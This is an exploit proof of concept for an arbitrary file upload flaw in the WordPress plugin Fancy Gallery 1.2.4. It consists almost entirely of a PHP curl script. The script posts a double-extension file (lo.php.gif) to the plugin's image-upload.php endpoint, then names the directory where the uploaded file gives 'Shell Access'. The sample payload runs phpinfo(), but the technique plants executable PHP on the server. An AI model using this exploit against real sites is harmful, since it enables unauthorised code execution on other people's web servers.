WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload

1. <?php
2.  
3. $uploadfile="lo.php.gif";
4.  
5. $ch =
6. curl_init("http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php");
7.  
8. curl_setopt($ch, CURLOPT_POST, true);
9. curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$uploadfile"));
10. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
11. $postResult = curl_exec($ch);
12. curl_close($ch);
13.  
14. print "$postResult";
15.  
16. ?>
17.  
18. Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/
19. Filename : $postResult output
20.  
21. lo.php.gif
22. <?php
23. phpinfo();
24. ?>